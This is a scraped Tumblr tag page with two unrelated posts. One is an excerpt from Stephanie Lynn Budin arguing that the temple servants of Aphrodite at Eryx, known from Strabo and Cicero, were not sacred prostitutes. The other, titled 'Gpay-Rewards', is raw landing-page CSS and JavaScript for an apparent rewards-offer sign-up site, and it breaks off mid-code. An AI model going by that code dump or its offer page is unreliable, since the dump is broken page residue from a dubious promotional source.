#105;a!
Explore tagged Tumblr posts
gardenofkore · 5 years ago
Photo
Tumblr media
Also inhabited is Eryx, a lofty hill. It has an especially revered sanctuary of Aphrodite; in past times it was filled with women hierodules whom many of Sicily and elsewhere dedicated according to a vow. But now,just like the settlement itself, the sanctuary is depopulated and the plethora of sacred bodies has left.
[...]
Chronology and terminology are very much at issue here. Strabo is discussing two different times – the to palaion and nuni – and, potentially, two different categories of sacred persons – the hierodules and the hiera sômata. The various definitions of “hierodule” continued to function in the Roman period. […] The “women hierodules” discussed by Strabo in regards to Eryx seem to have a lot in common with their Corinthian counterparts – both are groups of exclusively women dedicated by men and women/Sicilians and others.
What about Strabo’s second term, the hiera sômata ? Who and what were these individuals populating the sanctuary of Eryx? From Strabo’s perspective, the term “sacred body” or “tou theou sômata ” (and as well the hieroi paides) could function as a synonym for “hierodule” especially in the more occidental regions of Anatolia. The epigraphic evidence from that region indicates that the hiera sômata worked for and came under the protection of the temples/deities. That “sacred bodies” worked for the temples is evident in a late third–early second-century bce building inscription from Didyma, where the temple architect and general manager give a list of expenditures, including an apologismos tôn gegenêmenôn dia tôn tou theou sômatôn, “an account of the works done by the bodies of the god.” 
[...]
Evidently the sacred bodies were a group desirable to steal and most honorable to return. Strabo’s Erycine hiera sômata might then simply be seen as a synonym for his previously mentioned hierodules. The only odd aspect of this reference is the exclusive sex of the hierodules; in other instances both males and females were dedicated to the various deities, both as hierodules and as hierai/hieroi. That male hiera sômata existed is evident in the Didyma passage quoted above. Furthermore, there remains the question of whether or not Strabo’s Anatolian-based vocabulary (he was from Comana) adequately captures the realities of the Roman institution of so-called hierodouleia.Fortunately, in the case of Eryx we have additional, first-hand evidence that paints a fuller picture of these individuals sacred to Erycine Aphrodite in the Roman period from an earlier author – Cicero. In his Div. against Q. Caecilius, his Against Verres, and his Pro Aulus Cluentius Cicero sheds considerable light on the status and functions of the Venerii – the “slaves” of Erycine Venus. The passage in Caecilius is at once the most familiar and confusing, ultimately revealing the differences in sacred slavery as it pertained to the Roman west. According to Cicero (17.55–56),
There is a certain woman, Agonis of Lilybaeum, a liberta of Venus Erycina, who was quite well-to-do and wealthy before this man was quaestor. An admiral of Antonius abducted some musician-slaves from her in a violent, insulting manner, whom he said he wanted to use in the navy. Then, as is the custom of those of Venus (Venerorum) and those who have liberated  themselves from Venus, she invoked religion upon the commander in the name of Venus; she said that both she and hers belonged to Venus. When this was reported to quaestor Caecilius – that best and most just of men! – he commanded that Agonis be called to him. Immediately he appointed a commission [to see] “If it appeared that she had said that she and hers belonged to Venus.” The justices judged that it was surely so, nor was there indeed any doubt that she had said this. Then the cad [Caecilius] took possession of the woman’s goods, sentenced her into servitude to Venus, then sold her goods and pocketed the money. And so because Agonis wanted to retain a little property by the name of Venus and religiosity, she lost all her fortunes and liberty by the outrage of this cad! Verres later came to Lilybaeum, heard the matter, annulled the judgment, and bade the quaestor to count up and pay back all the money he got for selling Agonis’s goods.
The notion of divine protection is strongly reminiscent of what we have seen in the Hellenized east. Agonis, a former slave of Erycine Venus (liberta Veneris Erycinae) still claims that both she and her household are under the goddess’s protection. And well she might, for this protected status is also recognized and respected by the Sicilian government (for the most part), Cicero, and presumably his audience.It must be noted, though, that the evidence from Eryx actually presents two separate categories of what might be termed in Greek hierodules: those who are free (as with the manumissions seen above) and those who still belonged to the goddess – “omnium Veneriorum et eorum qui a Venere se liberaverunt,” “all those of Venus and of those who have liberated themselves from Venus.” In contrast to the eastern tradition, in the Roman tradition it would appear that sacred slaves were the equivalent of state-owned slaves, with the temple as opposed to the government having ultimate authority over them. This is made clear in two additional passages from Cicero. In his Against Verres II, 38.86 Cicero, complaining about Verres’s abuses of power and nonstandard use of resources, mentions that when Verres was fleecing the people of Tissa:
     The collector you sent to deal with them was Diognetus – a man of      Venus (Venerium). A new style of tax-farming – why are the public      slaves (servi publicani) here in Rome not taking up tax-farming as well      through this fellow?
Cicero equates the man of Venus – Diognetus – to a servus publicanus, a public slave. That those belonging to deities were not considered to be free as were their eastern cognates is also evident in the cult of another deity – Mars of Larinum. In his Defense of Cluentius Cicero discusses a political power-play in this town pertaining to the Martiales – “those of Mars” (15.43):
     In Larinum there are certain men called Martiales, public ministers      (ministri publici) of Mars and consecrated to this god by the ancient      institutions and religious ordinances of Larinum. There was quite a      large number of them, and as well, just as the case in Sicily with the      many Venerii, so too these men of Larinum were reckoned to be in the      familia of Mars. But quickly Oppianicus began to demand that these      men be free and Roman citizens.
The Martiales, who are likened to the Sicilian Venerii, are neither free nor citizens. Furthermore, they are reckoned to be in the familia of Mars. To be in a Roman-style familia is not to be a member of the blood clan, a concept better expressed by the word gens, but to be a member of a household, including the status of household slave. The Venerii, like the Martiales, then, were slaves belonging to a deity, and thus the temple, but otherwise likened to the state servi publicani. It is easy to understand how the sacred servi would be under the protection of their patron deities. However, as stated in Cicero’s anecdote about Agonis, she was a former Veneria, a liberta of Venus Erycina. Nevertheless, she claimed that both she and her own household still fell under the goddess’s protection. Thus two classes of sacred slaves, one actual slaves, one freedpersons, but equally under divine protection.
[...]
In this way, even though the former Veneria (or Martialis) was technically now a liberta, she remained to some extent within the famila of Venus, acquiring the goddess’s protection not only for herself, but also for her own household familia who might be called upon to help in the service of the deity. If we might accept that Cicero’s Venerii were the Latin “translation” of Strabo’s hierodules and hiera sômata, we must question Strabo’s understanding of the Sicilian practice. For, once again, Strabo claimed that the hierodules (and presumably the hiera sômata?) were female. It is very clear from the Roman evidence, however, that the Venerii of Eryx were not exclusively female. To give a quick summary of the various uses and abuses of these Venerii as enacted by Verres and condemned by Cicero in Verres II,
     They acted as provincial police either directly under the governor or      indirectly under his agents (3, 61; 74; 89; 105; 143; 200; 228). They      made arrests and executed not only the sentences of the governor’s      court (2, 92–93) but also, it would seem, the decisions of the tithe      contractors (ibid., 3, 50); ran errands for the governor and carried out      his commands that were not of a judicial nature (3, 55; 4, 32); took      charge of the moneys and goods he ordered sequestered (3, 183; 4,      104); acted as bodyguard to his satellites (3, 65); were the beneficiaries      of donations forced upon the cities by the governor (3, 143; 5, 141);      collected the offerings, dues and emoluments accruing to the temple      of their goddess (2, 92–93).
It may be my own deeply rooted sexism showing, but I have a terrible time imagining that these functionaries were female, especially the bodyguards (although I suppose having sacred prostitutes as police, tax collectors, and bodyguards might have contributed significantly to local feelings of goodwill toward the Romans . . .). While some of the Venerii, and thus the hiera sômata, were certainly female, as is evidenced by Agonis, many were also male.How might we understand Strabo’s “mistake”? First, we must remember that by the time of Strabo’s writing the “plethora of sacred bodies had left.” Strabo never actually saw any of these hiera sômata, and thus he was writing based on tradition. Furthermore, it is possible that Strabo allowed his knowledge of the Corinthian custom to color his understanding of the Erycinian. In both instances, both set definitively in the past, Strabo understood that the general populace dedicated hierodules to Aphrodite. In both instances, the sanctuary itself was famous for its wealth in times of old (see below). It is possible, then, that Strabo’s “knowledge” of Corinth colored his view of Eryx, claiming that only female hierodules (but not hetairai!) were originally associated with the sanctuary. As Strabo seems to have understood it, the temple of Aphrodite at Eryx was once populated by a number of female hierodules. Unlike Cicero, he was not entirely specific about whether the temple directly owned the hierodules; he merely related that in olden times the temple was “filled with” hierodules, and later, when the going got tough, the sacred bodies left. This stands in contrast with Cicero, who relates that the temple did in fact own Venerii, both female and male. In neither the Strabonic nor the Ciceronian accounts is there any evidence that would suggest that the normal service activity of the hierodules for the temple was sacred prostitution, either for the males or for the females, just as there is no suggestion in the literature that the Martiales, who are compared to the Venerii, are prostitutes for Mars. Nevertheless, the “sacred bodies” are often taken to be sacred prostitutes, the descendants of the female hierodules of earlier times who are also, of course, understood to have been sacred prostitutes. Furthermore, their sacred meretricious profession is generally traced back to the early Phoenician/Punic habitation of the site. The sacred prostitutes of Erycine Aphrodite are a holdover from the sacred prostitutes of Erycine Aštart.As with Corinth, then, sacred prostitution is understood to emerge from an initially Semitic influence. This, of course, is hogwash. As discussed previously, there is no “Semitic” sacred prostitution (see Chapter 2). Theword “hierodule” does not mean sacred prostitute and does not come into use in the Greek (much less Roman) vocabulary until the mid-3rd century bce. Thucydides fails to mention the temple slaves when discussing the apparent wealth of that sanctuary of Aphrodite of Eryx in 6.46.7–11 of his Peloponnesian War:
     And leading them to the sanctuary of Aphrodite in Eryx they showed      them the dedications, phiales and wine jugs and incense burners and      not an insignificant amount of other paraphernalia which, being silver,      presented an appearance of much greater worth by far.
Although it is never safe to argue from negative evidence, the evidence from Thucydides strongly suggests that there were no “sacred slaves” of Erycine Aphrodite in the fifth century bce, a point after the Greeks had assumed political and cultural control of the island from the Carthaginians, as well as the cult of the Erycinian. There can be no continuity, then, between the supposed sacred prostitutes of the cult of Erycine Aštart and those of Erycine Aphrodite or Venus. Strabo’s section 6.2.6 is not evidence for sacred prostitution in Sicily; it is a commentary on the women dedicated to a temple of Venus and how, in “modern” (for Strabo) times, the temple and town, having fallen on hard times, has fewer temple attendants – hierodules, hiera sômata, Venerii – than previously. Nothing indicates that the hierodules had prostitution as an aspect of their temple service, either for the males or the females.
Stephanie Lynn Budin, The Mith of Sacred Prostitution in Antiquity, 184-191
17 notes · View notes
summerseasonsale · 5 years ago
Text
Gpay-Rewardssection#section-tfl06vs [data-section="wrap"] { width: 980px; } section#section-tfl06vs { z-index: 2; } section#section-wbv7tjw [data-section="wrap"] { width: 980px; } section#section-wbv7tjw { z-index: 2; } section#section-n7e5d2e [data-section="wrap"] { width: 980px; } section#section-n7e5d2e { z-index: 2; } div#edi-h8os7pf img { width: 307px; height: 601px; left: 209px; top: 6px; } div#edi-h8os7pf { top: 93px; left: 69.0018px; width: 843.969px; height: 637px; background: url("https://us-ms.gr-cdn.com/getresponse-w2nbL/photos/e57e471b-8338-425b-94e3-46d7603093d7.jpg") 209px 6px / 307px no-repeat; z-index: 2; transform-origin: 0px 0px; } div#edi-4xy7rr2 { top: 48px; left: 175px; width: 640px; height: auto; } div#edi-qdhgpyr { top: 163px; left: 95px; width: 295px; height: 57px; } div#webform_text-dzbvy4v { height: 100%; width: 100%; } div#webform_label-ltqmhad { height: 100%; width: 100%; } div#edi-8psufse { top: 77px; width: 484px; height: 57px; } div#webform_text-kmd9t1d { height: 100%; width: 100%; } div#webform_label-98u67hc { height: 100%; width: 100%; } div#edi-p0xhgcc { width: 484px; height: 57px; } div#edi-zxwr4wp { top: 143px; left: 253px; width: 484px; height: 220px; } section#section-6y4k4gy [data-section="wrap"] { width: 980px; } section#section-6y4k4gy { height: 1229px; z-index: 2; background-color: rgb(0, 105, 216); background-image: none; } section#section-robx27d [data-section="wrap"] { width: 980px; } section#section-robx27d { z-index: 2; }section#section-tfl06vs [data-section="wrap"] { width: 400px; } section#section-wbv7tjw [data-section="wrap"] { width: 400px; } div#edi-h8os7pf img { width: 310.51px; height: 601px; left: 92px; top: 8px; } section#section-6y4k4gy { height: 659px; z-index: 2; } div#edi-h8os7pf { -webkit-transform: scale(1, 1);-moz-transform: scale(1, 1);-ms-transform: scale(1, 1);transform: scale(1, 1); transform-origin: 0px 0px; top: -1px; left: -47.8622px; width: 856.724px; height: 647px; background-size: 310.51px 601px; z-index: 2; background-position: 92px 8px; } section#section-6y4k4gy [data-section="wrap"] { width: 400px; } section#section-robx27d [data-section="wrap"] { width: 400px; } [data-editable="text"] { text-align: center; } [hidden-on-phone="true"] { display: none; } (function (fontFamily, subset, config) { if (!config.google) { config.google = {}; } if (!config.google.families) { config.google.families = []; } config.classes = false; fontFamily.forEach(function (item) { config.google.families.push(item + ':' + subset); }); (function (src) { var wf = document.createElement('script'); wf.src = src; wf.type = 'text/javascript'; wf.async = 'true'; document.head.appendChild(wf); }(window.location.protocol + '//ajax.googleapis.com/ajax/libs/webfont/1.6.16/webfont.js')); }(['Roboto:100,300,400,500,700,900'], 'latin', window.WebFontConfig = window.WebFontConfig || {})); var _vwo_code=(function(){ var account_id=4859, settings_tolerance=2000, library_tolerance=1500, use_existing_jquery=false, // DO NOT EDIT BELOW THIS LINE f=false,d=document;return{use_existing_jquery:function(){return use_existing_jquery;},library_tolerance:function(){return library_tolerance;},finish:function(){if(!f){f=true;var a=d.getElementById('_vis_opt_path_hides');if(a)a.parentNode.removeChild(a);}},finished:function(){return f;},load:function(a){var b=d.createElement('script');b.src=a;b.type='text/javascript';b.innerText;b.onerror=function(){_vwo_code.finish();};d.getElementsByTagName('head')[0].appendChild(b);},init:function(){settings_timer=setTimeout('_vwo_code.finish()',settings_tolerance);this.load('//dev.visualwebsiteoptimizer.com/j.php?a='+account_id+'&u='+encodeURIComponent(d.URL)+'&r='+Math.random());var a=d.createElement('style'),b='body{opacity:0 !important;filter:alpha(opacity=0) !important;background:none !important;}',h=d.getElementsByTagName('head')[0];a.setAttribute('id','_vis_opt_path_hides');a.setAttribute('type','text/css');if(a.styleSheet)a.styleSheet.cssText=b;else a.appendChild(d.createTextNode(b));h.appendChild(a);return settings_timer;}};}());_vwo_settings_timer=_vwo_code.init(); var grLpsInitialData = { userId: 'w2nbL', google_adwords_id: '', google_adwords_conversion_label: '', country_phone_codes: JSON.parse('[{"cc":"af","code":"93","name":"Afghanistan","format":null},{"cc":"al","code":"355","name":"Albania","format":null},{"cc":"dz","code":"213","name":"Algeria","format":null},{"cc":"as","code":"1684","name":"American Samoa","format":"(XXX) XXX-XXXX"},{"cc":"ad","code":"376","name":"Andorra","format":null},{"cc":"ao","code":"244","name":"Angola","format":null},{"cc":"ai","code":"1264","name":"Anguilla","format":"(XXX) XXX-XXXX"},{"cc":"aq","code":"672","name":"Antarctica","format":null},{"cc":"ag","code":"1268","name":"Antigua & Barbuda","format":"(XXX) XXX-XXXX"},{"cc":"ar","code":"54","name":"Argentina","format":null},{"cc":"am","code":"374","name":"Armenia","format":null},{"cc":"aw","code":"297","name":"Aruba","format":null},{"cc":"au","code":"61","name":"Australia","format":null},{"cc":"at","code":"43","name":"Austria","format":null},{"cc":"az","code":"994","name":"Azerbaijan","format":null},{"cc":"bs","code":"1242","name":"Bahamas","format":"(XXX) XXX-XXXX"},{"cc":"bh","code":"973","name":"Bahrain","format":null},{"cc":"bd","code":"880","name":"Bangladesh","format":null},{"cc":"bb","code":"1246","name":"Barbados","format":null},{"cc":"by","code":"375","name":"Belarus","format":null},{"cc":"be","code":"32","name":"Belgium","format":null},{"cc":"bz","code":"501","name":"Belize","format":null},{"cc":"bj","code":"229","name":"Benin","format":null},{"cc":"bm","code":"1441","name":"Bermuda","format":"(XXX) XXX-XXXX"},{"cc":"bt","code":"975","name":"Bhutan","format":null},{"cc":"bo","code":"591","name":"Bolivia","format":null},{"cc":"ba","code":"387","name":"Bosnia and Herzegovina","format":null},{"cc":"bw","code":"267","name":"Botswana","format":null},{"cc":"br","code":"55","name":"Brazil","format":null},{"cc":"io","code":"246","name":"British Indian Ocean Territory","format":null},{"cc":"bn","code":"673","name":"Brunei Darussalam","format":null},{"cc":"bg","code":"359","name":"Bulgaria","format":null},{"cc":"bf","code":"226","name":"Burkina Faso","format":null},{"cc":"bi","code":"257","name":"Burundi","format":null},{"cc":"kh","code":"855","name":"Cambodia","format":null},{"cc":"cm","code":"237","name":"Cameroon","format":null},{"cc":"ca","code":"1","name":"Canada","format":"(XXX) XXX-XXXX"},{"cc":"cv","code":"238","name":"Cape Verde","format":null},{"cc":"ky","code":"1345","name":"Cayman Islands","format":"(XXX) XXX-XXXX"},{"cc":"cf","code":"236","name":"Central African Republic","format":null},{"cc":"td","code":"235","name":"Chad","format":null},{"cc":"cl","code":"56","name":"Chile","format":null},{"cc":"cn","code":"86","name":"China","format":null},{"cc":"cx","code":"61","name":"Christmas Island","format":null},{"cc":"cc","code":"61","name":"Cocos Islands (Keeling) ","format":null},{"cc":"co","code":"57","name":"Colombia","format":null},{"cc":"km","code":"269","name":"Comoros","format":null},{"cc":"cg","code":"242","name":"Congo","format":null},{"cc":"cd","code":"243","name":"Democratic Republic of the Congo","format":null},{"cc":"ck","code":"682","name":"Cook Islands","format":null},{"cc":"cr","code":"506","name":"Costa Rica","format":null},{"cc":"ci","code":"225","name":"Cote d\u0027Ivoire","format":null},{"cc":"hr","code":"385","name":"Croatia","format":null},{"cc":"cu","code":"53","name":"Cuba","format":null},{"cc":"cy","code":"357","name":"Cyprus","format":null},{"cc":"cz","code":"420","name":"Czech Republic","format":null},{"cc":"dk","code":"45","name":"Denmark","format":null},{"cc":"dj","code":"253","name":"Djibouti","format":null},{"cc":"dm","code":"1767","name":"Dominica","format":"(XXX) XXX-XXXX"},{"cc":"do","code":"1809","name":"Dominican Republic","format":"(XXX) XXX-XXXX"},{"cc":"do","code":"1829","name":"Dominican Republic","format":"(XXX) XXX-XXXX"},{"cc":"do","code":"1849","name":"Dominican Republic","format":"(XXX) XXX-XXXX"},{"cc":"ec","code":"593","name":"Ecuador","format":null},{"cc":"eg","code":"20","name":"Egypt","format":null},{"cc":"sv","code":"503","name":"El Salvador","format":null},{"cc":"gq","code":"240","name":"Equatorial Guinea","format":null},{"cc":"er","code":"291","name":"Eritrea","format":null},{"cc":"ee","code":"372","name":"Estonia","format":null},{"cc":"et","code":"251","name":"Ethiopia","format":null},{"cc":"fk","code":"500","name":"Falkland Islands (Malvinas)","format":null},{"cc":"fo","code":"298","name":"Faroe Islands","format":null},{"cc":"fj","code":"679","name":"Fiji","format":null},{"cc":"fi","code":"358","name":"Finland","format":null},{"cc":"fr","code":"33","name":"France","format":"X XX XX XX XX"},{"cc":"pf","code":"689","name":"French Polynesia","format":null},{"cc":"ga","code":"241","name":"Gabon","format":null},{"cc":"gm","code":"220","name":"Gambia","format":null},{"cc":"ge","code":"995","name":"Georgia","format":null},{"cc":"de","code":"49","name":"Germany","format":null},{"cc":"gh","code":"233","name":"Ghana","format":null},{"cc":"gi","code":"350","name":"Gibraltar","format":null},{"cc":"gr","code":"30","name":"Greece","format":null},{"cc":"gl","code":"299","name":"Greenland","format":null},{"cc":"gd","code":"1473","name":"Grenada","format":"(XXX) XXX-XXXX"},{"cc":"gu","code":"1671","name":"Guam","format":"(XXX) XXX-XXXX"},{"cc":"gt","code":"502","name":"Guatemala","format":null},{"cc":"gg","code":"441481","name":"Guernsey","format":null},{"cc":"gn","code":"224","name":"Guinea","format":null},{"cc":"gw","code":"245","name":"Guinea-bissau","format":null},{"cc":"gy","code":"592","name":"Guyana","format":null},{"cc":"ht","code":"509","name":"Haiti","format":null},{"cc":"hn","code":"504","name":"Honduras","format":null},{"cc":"hk","code":"852","name":"Hong Kong","format":"XXXX XXXX"},{"cc":"hu","code":"36","name":"Hungary","format":null},{"cc":"is","code":"354","name":"Iceland","format":null},{"cc":"in","code":"91","name":"India","format":"XXXXX-XXXXX"},{"cc":"id","code":"62","name":"Indonesia","format":null},{"cc":"ir","code":"98","name":"Islamic Republic of Iran","format":null},{"cc":"iq","code":"964","name":"Iraq","format":null},{"cc":"ie","code":"353","name":"Ireland","format":null},{"cc":"im","code":"441624","name":"Isle of man","format":null},{"cc":"il","code":"972","name":"Israel","format":null},{"cc":"it","code":"39","name":"Italy","format":null},{"cc":"jm","code":"1876","name":"Jamaica","format":"(XXX) XXX-XXXX"},{"cc":"jp","code":"81","name":"Japan","format":null},{"cc":"je","code":"441534","name":"Jersey","format":null},{"cc":"jo","code":"962","name":"Jordan","format":null},{"cc":"kz","code":"7","name":"Kazakhstan","format":"(XXX) XXX XX XX"},{"cc":"ke","code":"254","name":"Kenya","format":null},{"cc":"ki","code":"686","name":"Kiribati","format":null},{"cc":"kp","code":"850","name":"Democratic People\u0027s Republic of Korea","format":null},{"cc":"kr","code":"82","name":"Republic of Korea","format":null},{"cc":"kw","code":"965","name":"Kuwait","format":null},{"cc":"kg","code":"996","name":"Kyrgyzstan","format":null},{"cc":"la","code":"856","name":"People\u0027s Democratic Republic of Lao","format":null},{"cc":"lv","code":"371","name":"Latvia","format":null},{"cc":"lb","code":"961","name":"Lebanon","format":null},{"cc":"ls","code":"266","name":"Lesotho","format":null},{"cc":"lr","code":"231","name":"Liberia","format":null},{"cc":"ly","code":"218","name":"Libya","format":null},{"cc":"li","code":"423","name":"Liechtenstein","format":null},{"cc":"lt","code":"370","name":"Lithuania","format":null},{"cc":"lu","code":"352","name":"Luxembourg","format":null},{"cc":"mo","code":"853","name":"Macao","format":null},{"cc":"mk","code":"389","name":"Republic of Macedonia","format":null},{"cc":"mg","code":"261","name":"Madagascar","format":null},{"cc":"mw","code":"265","name":"Malawi","format":null},{"cc":"my","code":"60","name":"Malaysia","format":null},{"cc":"mv","code":"960","name":"Maldives","format":null},{"cc":"ml","code":"223","name":"Mali","format":null},{"cc":"mt","code":"356","name":"Malta","format":null},{"cc":"mh","code":"692","name":"Marshall Islands","format":null},{"cc":"mr","code":"222","name":"Mauritania","format":null},{"cc":"mu","code":"230","name":"Mauritius","format":null},{"cc":"yt","code":"262","name":"Mayotte","format":null},{"cc":"mx","code":"52","name":"Mexico","format":"XXX XXX XXXX"},{"cc":"fm","code":"691","name":"Federated States of Micronesia","format":null},{"cc":"md","code":"373","name":"Republic of Moldova","format":null},{"cc":"mc","code":"377","name":"Monaco","format":null},{"cc":"mn","code":"976","name":"Mongolia","format":null},{"cc":"me","code":"382","name":"Montenegro","format":null},{"cc":"ms","code":"1664","name":"Montserrat","format":"(XXX) XXX-XXXX"},{"cc":"ma","code":"212","name":"Morocco","format":null},{"cc":"mz","code":"258","name":"Mozambique","format":null},{"cc":"mm","code":"95","name":"Myanmar","format":null},{"cc":"na","code":"264","name":"Namibia","format":null},{"cc":"nr","code":"674","name":"Nauru","format":null},{"cc":"np","code":"977","name":"Nepal","format":null},{"cc":"nl","code":"31","name":"Netherlands","format":null},{"cc":"an","code":"599","name":"Netherlands Antilles","format":null},{"cc":"nc","code":"687","name":"New Caledonia","format":null},{"cc":"nz","code":"64","name":"New Zealand","format":null},{"cc":"ni","code":"505","name":"Nicaragua","format":null},{"cc":"ne","code":"227","name":"Niger","format":null},{"cc":"ng","code":"234","name":"Nigeria","format":null},{"cc":"nu","code":"683","name":"Niue","format":null},{"cc":"mp","code":"1670","name":"Northern Mariana Islands","format":"(XXX) XXX-XXXX"},{"cc":"no","code":"47","name":"Norway","format":null},{"cc":"om","code":"968","name":"Oman","format":null},{"cc":"pk","code":"92","name":"Pakistan","format":null},{"cc":"pw","code":"680","name":"Palau","format":null},{"cc":"ps","code":"970","name":"Occupied Palestinian Territory","format":null},{"cc":"pa","code":"507","name":"Panama","format":null},{"cc":"pg","code":"675","name":"Papua New Guinea","format":null},{"cc":"py","code":"595","name":"Paraguay","format":null},{"cc":"pe","code":"51","name":"Peru","format":null},{"cc":"ph","code":"63","name":"Philippines","format":null},{"cc":"pn","code":"64","name":"Pitcairn","format":null},{"cc":"pl","code":"48","name":"Poland","format":"XXX XXX XXX"},{"cc":"pt","code":"351","name":"Portugal","format":null},{"cc":"pr","code":"1787","name":"Puerto Rico","format":"(XXX) XXX-XXXX"},{"cc":"pr","code":"1939","name":"Puerto Rico","format":"(XXX) XXX-XXXX"},{"cc":"qa","code":"974","name":"Qatar","format":null},{"cc":"re","code":"262","name":"R\u00e9union","format":null},{"cc":"ro","code":"40","name":"Romania","format":null},{"cc":"ru","code":"7","name":"Russian Federation","format":null},{"cc":"rw","code":"250","name":"Rwanda","format":null},{"cc":"bl","code":"590","name":"Saint Barth\u00e9lemy","format":null},{"cc":"sh","code":"290","name":"Saint Helena","format":null},{"cc":"kn","code":"1869","name":"Saint Kitts and Nevis","format":"(XXX) XXX-XXXX"},{"cc":"lc","code":"1758","name":"Saint Lucia","format":"(XXX) XXX-XXXX"},{"cc":"mf","code":"590","name":"Saint Martin","format":null},{"cc":"pm","code":"508","name":"Saint Pierre and Miquelon","format":null},{"cc":"vc","code":"1784","name":"Saint Vincent and the Grenadines","format":"(XXX) XXX-XXXX"},{"cc":"ws","code":"685","name":"Samoa","format":null},{"cc":"sm","code":"378","name":"San Marino","format":null},{"cc":"st","code":"239","name":"Sao Tome and Principe","format":null},{"cc":"sa","code":"966","name":"Saudi Arabia","format":null},{"cc":"sn","code":"221","name":"Senegal","format":null},{"cc":"rs","code":"381","name":"Serbia","format":null},{"cc":"sc","code":"248","name":"Seychelles","format":null},{"cc":"sl","code":"232","name":"Sierra Leone","format":null},{"cc":"sg","code":"65","name":"Singapore","format":null},{"cc":"sk","code":"421","name":"Slovakia","format":null},{"cc":"si","code":"386","name":"Slovenia","format":null},{"cc":"sb","code":"677","name":"Solomon Islands","format":null},{"cc":"so","code":"252","name":"Somalia","format":null},{"cc":"za","code":"27","name":"South Africa","format":null},{"cc":"es","code":"34","name":"Spain","format":null},{"cc":"lk","code":"94","name":"Sri Lanka","format":null},{"cc":"sd","code":"249","name":"Sudan","format":null},{"cc":"sr","code":"597","name":"Suriname","format":null},{"cc":"sj","code":"47","name":"Svalbard and Jan Mayen","format":null},{"cc":"sz","code":"268","name":"Swaziland","format":null},{"cc":"se","code":"46","name":"Sweden","format":null},{"cc":"ch","code":"41","name":"Switzerland","format":null},{"cc":"sy","code":"963","name":"Syrian Arab Republic","format":null},{"cc":"tw","code":"886","name":"Taiwan","format":"XXX XXXXXX"},{"cc":"tj","code":"992","name":"Tajikistan","format":null},{"cc":"tz","code":"255","name":"United Republic Of Tanzania","format":null},{"cc":"th","code":"66","name":"Thailand","format":null},{"cc":"tl","code":"670","name":"Timor-Leste","format":null},{"cc":"tg","code":"228","name":"Togo","format":null},{"cc":"tk","code":"690","name":"Tokelau","format":null},{"cc":"to","code":"676","name":"Tonga","format":null},{"cc":"tt","code":"1868","name":"Trinidad and Tobago","format":"(XXX) XXX-XXXX"},{"cc":"tn","code":"216","name":"Tunisia","format":null},{"cc":"tr","code":"90","name":"Turkey","format":null},{"cc":"tm","code":"993","name":"Turkmenistan","format":null},{"cc":"tc","code":"1649","name":"Turks and Caicos Islands","format":"(XXX) XXX-XXXX"},{"cc":"tv","code":"688","name":"Tuvalu","format":null},{"cc":"ug","code":"256","name":"Uganda","format":null},{"cc":"ua","code":"380","name":"Ukraine","format":null},{"cc":"ae","code":"971","name":"United Arab Emirates","format":null},{"cc":"gb","code":"44","name":"United Kingdom","format":"XXX XXX XXXX"},{"cc":"us","code":"1","name":"United States","format":"(XXX) XXX-XXXX"},{"cc":"uy","code":"598","name":"Uruguay","format":null},{"cc":"uz","code":"998","name":"Uzbekistan","format":null},{"cc":"vu","code":"678","name":"Vanuatu","format":null},{"cc":"va","code":"379","name":"Vatican City State","format":null},{"cc":"ve","code":"58","name":"Bolivarian Republic Of Venezuela","format":null},{"cc":"vn","code":"84","name":"Vietnam","format":null},{"cc":"vg","code":"1284","name":"British Virgin Islands","format":"(XXX) XXX-XXXX"},{"cc":"vi","code":"1340","name":"U.S. Virgin Islands","format":"(XXX) XXX-XXXX"},{"cc":"wf","code":"681","name":"Wallis and Futuna","format":null},{"cc":"eh","code":"212","name":"Western Sahara","format":null},{"cc":"ye","code":"967","name":"Yemen","format":null},{"cc":"zm","code":"260","name":"Zambia","format":null},{"cc":"zw","code":"263","name":"Zimbabwe","format":null},{"cc":"cw","code":"599","name":"Curacao","format":null},{"cc":"ss","code":"211","name":"South Sudan","format":null},{"cc":"sx","code":"1721","name":"Sint Maarten","format":null}]'), country_code: 'gb', l10n: { ModSqueezePageLPCCreatePageWebformWebformFieldsRequiredField: 'This\u0020information\u0020is\u0020required', ModSqueezePageLPCCreatePageAutoFunnelProductsNotSelected: 'Please\u0020select\u0020a\u0020product', ModSqueezePageLPCCreatePageAutoFunnelBtnProcessingCaption: 'Processing', ModSqueezePageLPCCreatePageGrowlerErrorName: 'Error', ModSqueezePageLPCCreatePageGrowlerWarningName: 'Warning', ModSqueezePageLPCCreatePageGrowlerInfoName: 'Info', ModSqueezePageLPCCreatePageGrowlerSuccessName: 'Success', ModSqueezePageLPCFunnelConfirmationPageGoToURL: 'Go\u0020to\u0020URL', ModSqueezePageLPCFunnelConfirmationPageDownload: 'Download', ModSqueezePageLPCFunnelConfirmationPageProductDeliveryTokenTitle: 'Token\u0020to\u0020join\u003A', ModSqueezePageLPCFunnelConfirmationPageJoinTheWebinar: 'Join\u0020the\u0020webinar', ModSqueezePageLPCCreatePageInvalidDateFormat: 'Datetime\u0020format\u0020not\u0020recognized', ModSqueezePageLPCCreatePageDatePlaceholder: 'yyyy\u002Dmm\u002Ddd', ModSqueezePageLPCFunnelOrderFormPaymentGrowlerNoPostalCodeError: 'We\u0027re\u0020sorry,\u0020but\u0020a\u0020postal\u0020code\u0020is\u0020required\u0020to\u0020complete\u0020this\u0020transaction.\u0020Please\u0020contact\u0020the\u0020vendor.', }, thankyouurl: 'https://gpayrewardsoffers.subscribemenow.com/thank_you.html', thankyoutext: 'Thank you!' || 'Thank you!', url: 'https://gpayrewardsoffers.subscribemenow.com/', url_to_old_mobile_styles: 'https://us-as.gr-cdn.com/javascripts/core/lps/dist/old-mobile-styles.037ee22e7ce20b4a7999.css', url_product_box_default_image: 'https://gpayrewardsoffers.subscribemenow.com/images/lps/img/productBoxDefaultImage.png', webinars: { settings: { read: false, write: false, }, list: JSON.parse('' || null), }, variantId: 'hypxC', webformApps: JSON.parse('[]'), GDPRFields: JSON.parse('[]'.replace(/\n/g, '\\n')), isCustomCodeAllowed: true, grBadge: JSON.parse('{"imageUrl":"","redirectUrl":""}') || { 'imageUrl': '', 'redirectUrl': '' }, user_panel_lang: 'en', autoFunnel: { autoFunnelType: null, id: null, stepId: null, stepType: null, orderFormUrl: null, stripePaymentRequestButtonUrl: null, paymentProcessor: null, paymentProcessorToken: null, paymentStripeAPIKey: null, paymentStripeCountryCode: '' || 'US', processPaymentUrl: null, autoFunnelPaymentStatusUrl: null, cartId: null, formFieldsValues: [], boughtProducts: [], autoFunnelPaymentSquareLocationId: null, otoPageDismissUrl: null, otoPageAcceptUrl: null, enableOtoPageAction: '' === 'true', }, 